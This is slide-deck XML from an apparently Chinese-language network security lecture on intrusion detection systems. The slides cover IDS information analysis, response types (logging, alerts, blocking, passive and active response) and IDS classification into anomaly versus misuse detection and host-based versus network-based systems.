                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="组合 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="150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rPr>
                  <a:t>3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107440" y="3191510"/>
            <a:ext cx="3007360" cy="1939925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8E912C0-003B-4D87-9DA3-D7FE7F2805EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息分析</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978357" y="888983"/>
            <a:ext cx="10230365" cy="2202911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="60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第二部分 网络安全技术与应用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="60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第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="60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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="60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rPr>
              <a:t>讲 入侵检测技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="63000">
                    <a:srgbClr val="153B95"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="bg1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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D76FE92-7522-4BBF-B05C-AC124DB0E824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955953" y="3642360"/>
            <a:ext cx="10280093" cy="2702751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="154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38" name="Group 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5484C91-3363-4F7C-9680-59718B60CE18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104351" y="3798640"/>
            <a:ext cx="9983298" cy="2390190"/>
            <a:chOff x="0" y="3014"/>
            <a:chExt cx="6258" cy="1306"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="Picture 6" descr="ACF2A9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A747D5E-8EAE-4FDE-B0F2-31F74391E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4"/>
              <a:ext cx="171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91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC1A37BC-AB1D-434E-8FCC-65E05C5B97EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1714" y="3014"/>
              <a:ext cx="4544" cy="1306"/>
              <a:chOff x="1714" y="3014"/>
              <a:chExt cx="4544" cy="1306"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="Picture 5" descr="images">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C2E3CDD-CBA8-4D68-9561-51616C235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 y="3014"/>
                <a:ext cx="1460"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1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13418CB0-0835-4869-A08E-21B13A88EB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4" y="3014"/>
                <a:ext cx="1587"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descr="U2142P27T1D547450F26DT20090403073545">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A73264AC-1592-47F4-A503-AABF9E227A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214"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3301" y="3022"/>
                <a:ext cx="1587" cy="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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199255" y="1633855"/>
            <a:ext cx="71539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入侵检测系统一般采取的响应措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3990340" y="2327910"/>
            <a:ext cx="7351395" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11577" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="1025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分析结果记录到日志</a:t>
              </a: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3991610" y="3014980"/>
            <a:ext cx="6393180" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10068" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="8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告警信息</a:t>
              </a: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78" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2783032" y="4872016"/>
            <a:ext cx="818197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安全响应分为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>被动</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>响应</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主动</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>响应</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>两种类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3978698" y="3693355"/>
            <a:ext cx="6468438" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10068" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="8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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>阻断攻击</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11" name="组合 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="150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pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D107EA0E-CD2D-25FE-3F2D-733DF5DE31CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="979837" y="1962813"/>
            <a:ext cx="2988932" cy="2202831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3AF5DE3-75FD-40A1-B817-F7D591BCEC3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全响应</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357471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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199255" y="1633855"/>
            <a:ext cx="406019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依据入侵检测方法分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3990340" y="2327910"/>
            <a:ext cx="6780530" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10678" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="935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异常检测模型（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Anomaly Detection </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>）</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3991610" y="3867785"/>
            <a:ext cx="7259320" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11432" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="101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误用检测模型（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Misuse Detection</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>）</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19" name="图片 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1424940" y="2247900"/>
            <a:ext cx="2193925" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="3049270"/>
            <a:ext cx="6513195" cy="8147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fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>总结正常操作应该具有的特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（用户轮廓）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，当用户活动与正常行为有重大偏离时即被认为是入侵。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4827905" y="4505960"/>
            <a:ext cx="6513195" cy="112141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fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入侵行为特征库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，当监测的用户或系统行为与库中的记录相匹配时，系统就认为这种行为是入侵 。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C29802-BDA3-4546-BC77-DA044C1B335B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.3 IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分类</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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199255" y="1417955"/>
            <a:ext cx="46520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依据入侵检测信息来源分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3990340" y="1982470"/>
            <a:ext cx="3820160" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="6016" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="469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基于主机的入侵检测</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3991610" y="3360420"/>
            <a:ext cx="3818890" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="6014" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="469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基于网络的入侵检测</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19" name="图片 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1424940" y="2118360"/>
            <a:ext cx="2193925" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="2638425"/>
            <a:ext cx="6513195" cy="8147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fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测系统获取数据的依据是系统运行所在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，保护的目标也是系统运行所在的主机</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4827905" y="3912235"/>
            <a:ext cx="6513195" cy="112141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fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测系统获取数据的依据是网络传输的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，保护的目标是网络的正常运行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
